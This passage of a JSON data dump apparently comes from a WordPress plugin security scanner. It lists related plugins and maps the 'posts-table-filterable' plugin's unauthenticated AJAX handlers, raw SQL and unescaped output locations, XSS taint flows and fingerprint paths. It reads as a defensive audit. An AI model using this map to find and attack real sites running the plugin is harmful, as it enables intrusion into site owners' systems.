pages or widget content where you want it to appear. \u003C\u002Fp>\n\u003Ch3>Settings:\u003C\u002Fh3>\n\u003Cp>Now that your menu card is displayed, its time to customise the display of it. Go back to admin panel and navigate to settings under menu card section. Here you can completely control the display of your menu card (Example: column Layout, colour schemes, font size, Feature image).\u003C\u002Fp>\n\u003Ch3>JQuery Filter:\u003C\u002Fh3>\n\u003Cp>You may not notice but there is a stunning jQuery filter for your menu card. This filter works on the categories which allow your visitors to narrow down the list according to their needs.\u003C\u002Fp>\n\u003Ch3>Usage:\u003C\u002Fh3>\n\u003Cp>This plugin is named as Responsive menu card \u002F Price List Items, but it does not mean that it is limited to this; you can use it for any purpose where there is a list of items involved. May be you have a list of items like (Jobs, resources, projects, products etc.) and you want to display them on your website page and wants the filter functionality..? It will be helpful. \u003C\u002Fp>\n\u003Ch3>Items Ordering:\u003C\u002Fh3>\n\u003Cp>You can change the oder of your menu items by date, title, modified date, random, price or custom.\u003Cbr \u002F>\nIn case of custom you can use drag and drop to re-order your items as you like.\u003C\u002Fp>\n\u003Ch3>Category Ordering:\u003C\u002Fh3>\n\u003Cp>You can change the oder of your Categories by date, title, Post count, or custom.\u003C\u002Fp>\n","Create a customized and responsive menu card with price list items to your site.",200,10891,84,5,"2017-04-27T15:18:00.000Z","4.7.33","3.0","",[235,236,237,238,239],"category-items-filter","menu-card","price-list-items","price-table","responsive-menu-card","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fresponsive-menu-card-price-list-items\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fresponsive-menu-card-price-list-items.1.6.zip",{"slug":243,"name":244,"version":41,"author":245,"author_profile":246,"description":247,"short_description":248,"active_installs":249,"downloaded":250,"rating":251,"num_ratings":252,"last_updated":253,"tested_up_to":254,"requires_at_least":255,"requires_php":16,"tags":256,"homepage":233,"download_link":261,"security_score":194,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"admin-posts-grid","Admin Posts Grid","cheritto","https:\u002F\u002Fprofiles.wordpress.org\u002Fcheritto\u002F","\u003Cp>Cheritto’s Admin Posts Grid let you view the posts table as a grid of cards.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>several themes available;\u003C\u002Fli>\n\u003Cli>hide or show image, title, author, tags, categories and post date inside cards;\u003C\u002Fli>\n\u003Cli>adjustable number of columns;\u003C\u002Fli>\n\u003Cli>per-user preferences;\u003C\u002Fli>\n\u003Cli>quick edit support via ajax modal form.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Issues\u003C\u002Fh3>\n\u003Cp>If you find issues using this plugin please send feedback, I’ll do my best to fix asap.\u003C\u002Fp>\n","Beautiful posts grid on the admin side, many themes available, adjusable layout and more!",50,2257,100,2,"2024-04-26T08:52:00.000Z","6.5.8","6.0",[257,258,259,260,22],"admin-grid","admin-theme","cards","posts-list","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadmin-posts-grid.1.0.5.zip",{"slug":263,"name":264,"version":265,"author":266,"author_profile":267,"description":268,"short_description":269,"active_installs":270,"downloaded":271,"rating":29,"num_ratings":29,"last_updated":272,"tested_up_to":273,"requires_at_least":274,"requires_php":275,"tags":276,"homepage":233,"download_link":281,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"category-posts-filter","Category Posts Filter","1.0.0","YKR Infotech","https:\u002F\u002Fprofiles.wordpress.org\u002Fykrinfotechinfo\u002F","\u003Cp>Demo URL: https:\u002F\u002Fykrinfotech.com\u002Fcategory-posts-filter\u003C\u002Fp>\n\u003Cp>Category Posts Filter is a comprehensive WordPress plugin that allows you to:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Filter posts by category\u003C\u002Fli>\n\u003Cli>Sort posts by date or title\u003C\u002Fli>\n\u003Cli>Switch between list and grid views\u003C\u002Fli>\n\u003Cli>Customize background and text colors\u003C\u002Fli>\n\u003Cli>Easily embed posts using a shortcode\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Key Features:\u003Cbr \u002F>\n– Responsive design\u003Cbr \u002F>\n– AJAX-powered filtering\u003Cbr \u002F>\n– Customizable through WordPress admin\u003Cbr \u002F>\n– No page reload when filtering\u003Cbr \u002F>\n– Easy to use shortcode\u003C\u002Fp>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>For support, please email on: info@ykrinfotech.com\u003C\u002Fp>\n","A powerful WordPress plugin to filter and display posts with category and sorting options, supporting list and grid views.",10,487,"2024-12-28T11:38:00.000Z","6.7.5","5.0","7.2",[277,278,279,21,280],"category-filter","grid-view","list-view","sort","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcategory-posts-filter.zip",{"attackSurface":283,"codeSignals":551,"taintFlows":676,"riskAssessment":712,"analyzedAt":736},{"hooks":284,"ajaxHandlers":433,"restRoutes":528,"shortcodes":529,"cronEvents":549,"entryPointCount":550,"unprotectedCount":301},[285,290,294,297,300,302,305,307,310,312,315,316,318,320,324,327,328,330,332,335,338,340,341,344,346,349,353,355,357,360,362,366,369,372,375,378,382,385,388,391,394,396,399,402,404,406,407,411,413,415,417,419,421,424,426,429,431],{"type":286,"name":287,"callback":287,"priority":288,"file":289,"line":183},"action","admin_init",9999,"classes\\columns-fields-options.php",{"type":20,"name":291,"callback":292,"file":289,"line":293},"tableon_show_column_field_option","closure",23,{"type":286,"name":295,"callback":295,"file":289,"line":296},"admin_enqueue_scripts",45,{"type":286,"name":295,"callback":295,"file":298,"line":299},"classes\\columns.php",29,{"type":286,"name":287,"callback":287,"priority":288,"file":298,"line":301},30,{"type":286,"name":303,"callback":292,"file":298,"line":304},"tableon_columns_table",72,{"type":286,"name":287,"callback":287,"priority":288,"file":306,"line":183},"classes\\filter-fields-options.php",{"type":20,"name":308,"callback":292,"priority":270,"file":306,"line":309},"tableon_get_filter_field_options",22,{"type":286,"name":295,"callback":295,"file":306,"line":311},55,{"type":286,"name":295,"callback":295,"file":313,"line":314},"classes\\predefinition.php",19,{"type":286,"name":287,"callback":287,"priority":288,"file":313,"line":183},{"type":286,"name":295,"callback":295,"file":317,"line":183},"classes\\settings.php",{"type":286,"name":287,"callback":287,"priority":288,"file":317,"line":319},21,{"type":286,"name":321,"callback":292,"priority":322,"file":317,"line":323},"admin_bar_menu",250,64,{"type":286,"name":287,"callback":287,"priority":288,"file":325,"line":326},"classes\\tables-filter.php",17,{"type":286,"name":295,"callback":295,"file":325,"line":205},{"type":286,"name":295,"callback":295,"file":329,"line":293},"classes\\tables-meta.php",{"type":286,"name":287,"callback":287,"priority":288,"file":329,"line":331},24,{"type":20,"name":333,"callback":292,"priority":270,"file":329,"line":334},"tableon_table_orderby_select_args",28,{"type":286,"name":336,"callback":292,"file":329,"line":337},"tableon_meta_table",271,{"type":286,"name":295,"callback":295,"file":339,"line":216},"classes\\tables-options.php",{"type":286,"name":287,"callback":287,"priority":288,"file":339,"line":14},{"type":286,"name":342,"callback":292,"file":339,"line":343},"tableon_options_columns_table",75,{"type":286,"name":287,"callback":287,"priority":288,"file":345,"line":301},"classes\\tables.php",{"type":286,"name":347,"callback":292,"file":345,"line":348},"tableon_admin_table",60,{"type":20,"name":350,"callback":292,"file":351,"line":352},"tableon_current_lang","classes\\vocabulary.php",27,{"type":286,"name":295,"callback":295,"file":351,"line":354},37,{"type":286,"name":287,"callback":287,"priority":288,"file":351,"line":356},38,{"type":286,"name":287,"callback":292,"priority":288,"file":358,"line":359},"index.php",97,{"type":286,"name":295,"callback":295,"file":358,"line":361},108,{"type":286,"name":363,"callback":292,"priority":364,"file":358,"line":365},"admin_menu",99,127,{"type":286,"name":367,"callback":292,"file":358,"line":368},"wp_print_footer_scripts",159,{"type":20,"name":370,"callback":292,"file":358,"line":371},"theme_page_templates",1407,{"type":20,"name":373,"callback":292,"file":358,"line":374},"template_include",1413,{"type":286,"name":376,"callback":376,"priority":288,"file":358,"line":377},"init",1564,{"type":286,"name":379,"callback":380,"file":358,"line":381},"plugins_loaded","blank_page_init",1565,{"type":286,"name":383,"callback":292,"file":358,"line":384},"wp_loaded",1574,{"type":20,"name":386,"callback":292,"priority":270,"file":387,"line":216},"tableon_profile_extend","profiles\\default\\compatibility.php",{"type":286,"name":389,"callback":292,"priority":270,"file":387,"line":390},"tableon_filter_provider_mdtf",57,{"type":286,"name":287,"callback":287,"priority":288,"file":392,"line":393},"profiles\\default\\default.php",32,{"type":286,"name":376,"callback":376,"priority":288,"file":392,"line":395},33,{"type":286,"name":397,"callback":292,"priority":270,"file":392,"line":398},"tableon_filter_provider_default",35,{"type":20,"name":400,"callback":400,"priority":270,"file":392,"line":401},"tableon_extend_options",56,{"type":20,"name":403,"callback":292,"priority":270,"file":392,"line":390},"tableon_table_classes",{"type":20,"name":405,"callback":292,"priority":270,"file":392,"line":194},"tableon_wp_query_args",{"type":20,"name":405,"callback":292,"priority":270,"file":392,"line":204},{"type":20,"name":408,"callback":292,"priority":409,"file":392,"line":410},"posts_where",101,511,{"type":20,"name":408,"callback":292,"priority":409,"file":392,"line":412},548,{"type":20,"name":408,"callback":292,"priority":409,"file":392,"line":414},575,{"type":20,"name":408,"callback":292,"priority":409,"file":392,"line":416},692,{"type":20,"name":408,"callback":292,"priority":409,"file":392,"line":418},725,{"type":20,"name":408,"callback":292,"priority":409,"file":392,"line":420},758,{"type":286,"name":422,"callback":292,"priority":270,"file":423,"line":293},"tableon_extend_settings","profiles\\default\\single.php",{"type":286,"name":425,"callback":292,"priority":270,"file":423,"line":401},"tableon_extend_settings_default",{"type":20,"name":427,"callback":292,"priority":270,"file":423,"line":428},"tableon_get_table_single_post",79,{"type":286,"name":422,"callback":292,"priority":270,"file":430,"line":304},"profiles\\default\\universal.php",{"type":286,"name":425,"callback":292,"priority":270,"file":430,"line":432},103,[434,438,441,445,449,453,456,458,461,464,466,468,470,473,477,481,483,486,488,492,495,497,500,502,506,509,511,514,518,520,523,525],{"action":435,"nopriv":52,"callback":436,"hasNonce":52,"hasCapCheck":52,"file":289,"line":437},"tableon_save_table_column_field_option","save",46,{"action":439,"nopriv":52,"callback":440,"hasNonce":52,"hasCapCheck":52,"file":298,"line":401},"tableon_get_columns_data","get_columns_data",{"action":442,"nopriv":52,"callback":443,"hasNonce":444,"hasCapCheck":52,"file":298,"line":390},"tableon_save_table_column_field","save_column_field",true,{"action":446,"nopriv":52,"callback":447,"hasNonce":52,"hasCapCheck":52,"file":298,"line":448},"tableon_create_table_column","create_column",58,{"action":450,"nopriv":52,"callback":451,"hasNonce":52,"hasCapCheck":52,"file":298,"line":452},"tableon_refresh_columns_table","refresh",59,{"action":454,"nopriv":52,"callback":455,"hasNonce":52,"hasCapCheck":52,"file":298,"line":348},"tableon_delete_table_column","delete",{"action":457,"nopriv":52,"callback":436,"hasNonce":52,"hasCapCheck":52,"file":306,"line":401},"tableon_save_filter_field_option",{"action":459,"nopriv":52,"callback":460,"hasNonce":52,"hasCapCheck":52,"file":313,"line":437},"tableon_get_predefinition_table","get_table",{"action":462,"nopriv":52,"callback":436,"hasNonce":52,"hasCapCheck":52,"file":313,"line":463},"tableon_save_table_predefinition_field",47,{"action":465,"nopriv":52,"callback":436,"hasNonce":52,"hasCapCheck":52,"file":317,"line":463},"tableon_save_settings_field",{"action":467,"nopriv":52,"callback":292,"hasNonce":52,"hasCapCheck":52,"file":317,"line":249},"tableon_save_table_custom_css",{"action":469,"nopriv":52,"callback":292,"hasNonce":52,"hasCapCheck":52,"file":317,"line":311},"tableon_get_table_custom_css",{"action":471,"nopriv":52,"callback":472,"hasNonce":52,"hasCapCheck":52,"file":325,"line":301},"tableon_get_fields_for_filter","get_fields",{"action":474,"nopriv":52,"callback":475,"hasNonce":52,"hasCapCheck":52,"file":325,"line":476},"tableon_save_fields_for_filter","save_fields",31,{"action":478,"nopriv":52,"callback":479,"hasNonce":52,"hasCapCheck":52,"file":329,"line":480},"tableon_get_tables_meta","draw_table",82,{"action":482,"nopriv":52,"callback":436,"hasNonce":52,"hasCapCheck":52,"file":329,"line":215},"tableon_save_table_meta_field",{"action":484,"nopriv":52,"callback":485,"hasNonce":52,"hasCapCheck":52,"file":329,"line":228},"tableon_create_meta","create",{"action":487,"nopriv":52,"callback":455,"hasNonce":52,"hasCapCheck":52,"file":329,"line":194},"tableon_delete_table_meta",{"action":489,"nopriv":52,"callback":490,"hasNonce":52,"hasCapCheck":52,"file":339,"line":491},"tableon_get_tables_options","get_options",40,{"action":493,"nopriv":52,"callback":436,"hasNonce":52,"hasCapCheck":52,"file":339,"line":494},"tableon_save_table_option",41,{"action":496,"nopriv":52,"callback":485,"hasNonce":52,"hasCapCheck":52,"file":345,"line":296},"tableon_create_table",{"action":498,"nopriv":52,"callback":499,"hasNonce":52,"hasCapCheck":52,"file":345,"line":437},"tableon_save_table_field","update",{"action":501,"nopriv":52,"callback":455,"hasNonce":444,"hasCapCheck":52,"file":345,"line":463},"tableon_delete_table",{"action":503,"nopriv":52,"callback":504,"hasNonce":52,"hasCapCheck":52,"file":345,"line":505},"tableon_clone_table","clone",48,{"action":507,"nopriv":52,"callback":436,"hasNonce":52,"hasCapCheck":52,"file":351,"line":508},"tableon_save_vocabulary_field",63,{"action":510,"nopriv":52,"callback":485,"hasNonce":52,"hasCapCheck":52,"file":351,"line":323},"tableon_create_vocabulary_field",{"action":512,"nopriv":52,"callback":455,"hasNonce":52,"hasCapCheck":52,"file":351,"line":513},"tableon_delete_vocabulary_field",65,{"action":515,"nopriv":52,"callback":516,"hasNonce":52,"hasCapCheck":52,"file":358,"line":517},"tableon_get_table_data","get_table_data",76,{"action":515,"nopriv":444,"callback":516,"hasNonce":52,"hasCapCheck":52,"file":358,"line":519},77,{"action":521,"nopriv":52,"callback":522,"hasNonce":52,"hasCapCheck":52,"file":358,"line":428},"tableon_get_smth","get_smth",{"action":521,"nopriv":444,"callback":522,"hasNonce":52,"hasCapCheck":52,"file":358,"line":524},80,{"action":526,"nopriv":52,"callback":527,"hasNonce":52,"hasCapCheck":52,"file":358,"line":480},"tableon_import_data","import_data",[],[530,533,536,539,542,545,547],{"tag":24,"callback":531,"file":358,"line":532},"do_shortcode",74,{"tag":534,"callback":535,"file":358,"line":343},"tableon_button","do_shortcode_button",{"tag":537,"callback":292,"file":358,"line":538},"tableon_popup_iframe_button",1592,{"tag":540,"callback":292,"file":358,"line":541},"tableon_gallery",1640,{"tag":543,"callback":292,"file":358,"line":544},"tableon_single_btn",1696,{"tag":546,"callback":292,"file":392,"line":494},"tableon_drop_down",{"tag":548,"callback":292,"file":423,"line":359},"tableon_single",[],39,{"dangerousFunctions":552,"sqlUsage":553,"outputEscaping":588,"fileOperations":252,"externalRequests":29,"nonceChecks":252,"capabilityChecks":29,"bundledLibraries":675},[],{"prepared":554,"raw":555,"locations":556},11,15,[557,560,562,565,567,570,572,573,576,578,579,581,584,585,586],{"file":298,"line":558,"context":559},629,"$wpdb->get_results() with variable interpolation",{"file":329,"line":561,"context":559},510,{"file":345,"line":563,"context":564},111,"$wpdb->get_row() with variable interpolation",{"file":345,"line":566,"context":559},368,{"file":351,"line":568,"context":569},153,"$wpdb->get_var() with variable interpolation",{"file":351,"line":571,"context":564},216,{"file":351,"line":11,"context":559},{"file":574,"line":575,"context":569},"install.php",26,{"file":574,"line":577,"context":569},51,{"file":574,"line":517,"context":569},{"file":574,"line":580,"context":569},95,{"file":582,"line":216,"context":583},"uninstall.php","$wpdb->query() with variable interpolation",{"file":582,"line":14,"context":583},{"file":582,"line":555,"context":583},{"file":582,"line":587,"context":583},16,{"escaped":589,"rawEcho":590,"locations":591},203,43,[592,595,596,598,600,602,604,606,608,610,612,614,616,618,619,621,622,623,624,626,628,630,632,634,636,638,640,642,644,646,648,650,652,654,656,658,660,662,664,666,669,671,673],{"file":298,"line":593,"context":594},334,"raw output",{"file":306,"line":352,"context":594},{"file":313,"line":597,"context":594},61,{"file":329,"line":599,"context":594},249,{"file":339,"line":601,"context":594},54,{"file":351,"line":603,"context":594},126,{"file":358,"line":605,"context":594},152,{"file":358,"line":607,"context":594},160,{"file":358,"line":609,"context":594},1585,{"file":611,"line":587,"context":594},"profiles\\default\\views\\tableon_drop_down.php",{"file":613,"line":228,"context":594},"views\\options.php",{"file":613,"line":615,"context":594},93,{"file":613,"line":617,"context":594},201,{"file":613,"line":617,"context":594},{"file":613,"line":620,"context":594},202,{"file":613,"line":620,"context":594},{"file":613,"line":589,"context":594},{"file":613,"line":589,"context":594},{"file":613,"line":625,"context":594},219,{"file":613,"line":627,"context":594},238,{"file":613,"line":629,"context":594},245,{"file":613,"line":631,"context":594},252,{"file":613,"line":633,"context":594},259,{"file":613,"line":635,"context":594},266,{"file":613,"line":637,"context":594},273,{"file":613,"line":639,"context":594},280,{"file":613,"line":641,"context":594},287,{"file":613,"line":643,"context":594},297,{"file":613,"line":645,"context":594},302,{"file":613,"line":647,"context":594},308,{"file":613,"line":649,"context":594},314,{"file":613,"line":651,"context":594},328,{"file":613,"line":653,"context":594},335,{"file":613,"line":655,"context":594},361,{"file":613,"line":657,"context":594},437,{"file":613,"line":659,"context":594},451,{"file":613,"line":661,"context":594},501,{"file":613,"line":663,"context":594},550,{"file":665,"line":309,"context":594},"views\\popup.php",{"file":667,"line":668,"context":594},"views\\table.php",68,{"file":667,"line":670,"context":594},131,{"file":667,"line":672,"context":594},150,{"file":667,"line":674,"context":594},156,[],[677,693,702],{"entryPoint":678,"graph":679,"unsanitizedCount":49,"severity":42},"get_columns_data (classes\\columns.php:331)",{"nodes":680,"edges":691},[681,686],{"id":682,"type":683,"label":684,"file":298,"line":685},"n0","source","$_REQUEST",332,{"id":687,"type":688,"label":689,"file":298,"line":593,"wp_function":690},"n1","sink","echo() [XSS]","echo",[692],{"from":682,"to":687,"sanitized":52},{"entryPoint":694,"graph":695,"unsanitizedCount":29,"severity":701},"\u003Ccolumns> (classes\\columns.php:0)",{"nodes":696,"edges":699},[697,698],{"id":682,"type":683,"label":684,"file":298,"line":685},{"id":687,"type":688,"label":689,"file":298,"line":593,"wp_function":690},[700],{"from":682,"to":687,"sanitized":444},"low",{"entryPoint":703,"graph":704,"unsanitizedCount":49,"severity":701},"\u003Cindex> (index.php:0)",{"nodes":705,"edges":710},[706,709],{"id":682,"type":683,"label":707,"file":358,"line":708},"$_GET",1577,{"id":687,"type":688,"label":689,"file":358,"line":609,"wp_function":690},[711],{"from":682,"to":687,"sanitized":52},{"summary":713,"deductions":714},"The \"posts-table-filterable\" plugin version 1.0.4.4 presents a significant security risk due to a large attack surface with a high proportion of unprotected entry points, specifically 30 out of 39. The lack of authorization checks on numerous AJAX handlers is a major concern, as it could allow unauthenticated users to trigger potentially sensitive actions. While the plugin demonstrates some good practices like a high percentage of properly escaped output and a moderate use of prepared statements for SQL queries, these are overshadowed by the critical vulnerabilities.  \n\nThe vulnerability history is alarming, with a total of 7 known CVEs, including one critical and six medium severity issues. The fact that two vulnerabilities remain unpatched, with the last one reported as recently as 2026-01-20, indicates a pattern of persistent security flaws and potentially slow or inadequate patching by the developers. The common vulnerability types listed (XSS, Code Injection, Deserialization, Missing Authorization) are all serious and can lead to complete site compromise. The taint analysis, while limited in scope, did reveal flows with unsanitized paths, hinting at potential injection vulnerabilities that might not have been fully captured by the analysis or are yet to be discovered.  \n\nIn conclusion, despite some positive code signals regarding output escaping, the plugin's overall security posture is weak. The combination of a large, unprotected attack surface and a history of serious, unpatched vulnerabilities makes this plugin a high-risk component. Users should exercise extreme caution and consider deactivating or replacing it until all known vulnerabilities are addressed and the plugin's security practices are demonstrably improved.",[715,717,719,721,723,725,727,730,732,734],{"reason":716,"points":183},"Unpatched critical CVE",{"reason":718,"points":205},"Unpatched medium CVE (x6)",{"reason":720,"points":270},"Large attack surface without auth (30\u002F39)",{"reason":722,"points":270},"AJAX handlers without auth checks (30)",{"reason":724,"points":270},"Missing capability checks",{"reason":726,"points":28},"Flows with unsanitized paths",{"reason":728,"points":729},"SQL queries without prepared statements (58%)",7,{"reason":731,"points":229},"Low percentage of prepared statements (42%)",{"reason":733,"points":53},"File operations detected",{"reason":735,"points":252},"Nonce checks present but limited (2)","2026-03-16T20:02:28.597Z",{"wat":738,"direct":765},{"assetPaths":739,"generatorPatterns":751,"scriptPaths":752,"versionParams":753},[740,741,742,743,744,745,746,747,748,749,750],"\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fcss\u002Fadmin\u002Fsystem.css","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fjs\u002Fhelper.js","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fcss\u002Fselectm-23.css","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fjs\u002Fselectm-23.js","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fcss\u002Fgrowls.css","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fcss\u002Fpopup-23.css","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fcss\u002Fswitcher-23.css","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fcss\u002Fadmin\u002Foptions.css","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fjs\u002Fdata-table-23\u002Fdata-table-23.js","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fjs\u002Fdata-table-23\u002Fdata-table-23.css","\u002Fwp-content\u002Fplugins\u002Fposts-table-filterable\u002Fassets\u002Fjs\u002Ftableon-generator.js",[],[741,743,748,750],[754,755,756,757,758,759,760,761,762,763,764],"posts-table-filterable\u002Fassets\u002Fcss\u002Fadmin\u002Fsystem.css?ver=","posts-table-filterable\u002Fassets\u002Fjs\u002Fhelper.js?ver=","posts-table-filterable\u002Fassets\u002Fcss\u002Fselectm-23.css?ver=","posts-table-filterable\u002Fassets\u002Fjs\u002Fselectm-23.js?ver=","posts-table-filterable\u002Fassets\u002Fcss\u002Fgrowls.css?ver=","posts-table-filterable\u002Fassets\u002Fcss\u002Fpopup-23.css?ver=","posts-table-filterable\u002Fassets\u002Fcss\u002Fswitcher-23.css?ver=","posts-table-filterable\u002Fassets\u002Fcss\u002Fadmin\u002Foptions.css?ver=","posts-table-filterable\u002Fassets\u002Fjs\u002Fdata-table-23\u002Fdata-table-23.js?ver=","posts-table-filterable\u002Fassets\u002Fjs\u002Fdata-table-23\u002Fdata-table-23.css?ver=","posts-table-filterable\u002Fassets\u002Fjs\u002Ftableon-generator.js?ver=",{"cssClasses":766,"htmlComments":768,"htmlAttributes":769,"restEndpoints":771,"jsGlobals":775,"shortcodeOutput":777},[767],"tableon-admin-table",[],[770],"data-tableon-admin-table",[772,773,774],"\u002Fwp-json\u002Ftableon\u002Fv1\u002Fget_table_data","\u002Fwp-json\u002Ftableon\u002Fv1\u002Fget_smth","\u002Fwp-json\u002Ftableon\u002Fv1\u002Fimport_data",[776],"TABLEON_HELPER",[778,779],"[tableon]","[tableon_button]",{"error":444,"url":781,"statusCode":782,"statusMessage":783,"message":783},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fposts-table-filterable\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":29,"versions":785},[]]